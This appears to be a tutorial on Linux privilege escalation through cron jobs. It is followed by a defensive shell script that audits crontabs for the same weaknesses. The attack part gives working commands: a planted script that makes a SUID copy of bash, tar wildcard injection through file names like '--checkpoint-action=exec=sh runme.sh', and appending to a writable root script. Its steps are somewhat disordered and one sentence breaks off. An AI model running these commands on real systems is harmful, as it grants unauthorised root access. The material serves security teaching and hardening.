Scheduled tasks
First we check the system crontab, for example with cat /etc/crontab
If we cannot read this file, we can still enumerate scheduled tasks in other ways, using the PayloadsAllTheThings documentation or an enumeration tool like LinPEAS.
In our example the system tries to run a file that does not exist (if we ls /home/user we do not see it).
So we can create a file named overwrite.sh and make it escalate privileges.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
We create our overwrite.sh file. The script will create a copy of bash with the SUID bit set.
chmod +x /home/user/overwrite.sh
We need to make it executable.
/tmp/bash -p
We execute it and we get root.
cat /etc/crontab
In our example we have /usr/local/bin/compress.sh
We can have a look at the script with cat /usr/local/bin/compress.sh
The script goes to the user's home directory, makes a backup of its contents using a wildcard *, and stores it in tmp.
We cannot modify the script, so we need to abuse what the script does to get our privesc. Because the script uses tar, we can do this with tar options.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
We create a malicious bash script.
touch /home/user/--checkpoint=1
When the scheduled script reads the home directory, it will find a file named like a tar option, so tar will interpret it as one. This option displays a status message every 1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
Then this option makes tar perform an action when the checkpoint we created before is hit.
After a minute we can then launch our bash with /tmp/bash -p
We locate the file using locate overwrite.sh
We can overwrite it
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh
We are modifying the file by appending (>>) a command that will copy bash and give it SUID perms.
After a minute we should be able to launch /tmp/bash -p
We should be root!
cat /etc/crontab
In our example we will use the file overwrite.sh
Check the permissions on the file we want to overwrite with ls -l /usr/local/bin/overwrite.sh
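To audit a host for the three cron weaknesses described on this page (a root job resolved through a writable PATH directory or a missing file, a bare tar wildcard, and a writable script), the following shell functions are an added example, not part of the original page. TRUSTED_UID, the function names and the finding labels are names chosen here, and the fallback PATH of /usr/bin:/bin is an assumption for crontabs that set none.

```shell
#!/bin/sh
# Added audit example, not from the original page. Assumes the /etc/crontab
# layout "m h dom mon dow user command". TRUSTED_UID is a name chosen here.
TRUSTED_UID="${TRUSTED_UID:-0}"

# Succeeds when path $1 is owned by another uid or is group/other-writable.
# -L follows symlinks so a merged /bin -> usr/bin link is judged by its target.
unsafe() {
    meta=$(ls -ldnL -- "$1" 2>/dev/null) || return 1
    owner=$(printf '%s\n' "$meta" | awk '{print $3}')
    if [ "$owner" != "$TRUSTED_UID" ]; then return 0; fi
    case "$meta" in ?????w*|????????w*) return 0 ;; esac
    return 1
}

# Succeeds when script $1 hands a bare "*" to tar without a "--" guard, so
# file names that start with "--" would be parsed as tar options.
bare_tar_glob() {
    grep -E 'tar[[:space:]].*[[:space:]]\*([[:space:]]|$)' "$1" |
        grep -qv -- ' -- '
}

# Prints one finding per line for every root job in crontab file $1.
audit_crontab() {
    cron_path=$(sed -n 's/^PATH=//p' "$1" | tail -n 1)
    awk '$1 !~ /^#/ && NF >= 7 && $6 == "root" {print $7}' "$1" |
    while read -r cmd; do
        target=""
        case "$cmd" in
        */*) if [ -e "$cmd" ]; then target=$cmd; fi ;;
        *)  # Resolve the way cron does: first hit in PATH order wins.
            old_ifs=$IFS; IFS=:
            for dir in ${cron_path:-/usr/bin:/bin}; do
                if unsafe "$dir"; then echo "WRITABLE_DIR $dir $cmd"; fi
                if [ -e "$dir/$cmd" ]; then target=$dir/$cmd; break; fi
            done
            IFS=$old_ifs ;;
        esac
        if [ -z "$target" ]; then echo "MISSING $cmd"; continue; fi
        if unsafe "$target"; then echo "WRITABLE_FILE $target"; fi
        if bare_tar_glob "$target"; then echo "WILDCARD_TAR $target"; fi
    done
}

# Usage: audit_crontab /etc/crontab
```

Each finding maps to a fix: remove or lock down the WRITABLE_DIR entry in the crontab PATH, delete jobs reported as MISSING, make WRITABLE_FILE scripts root-owned with mode 755, and change WILDCARD_TAR lines to pass -- * or ./* to tar.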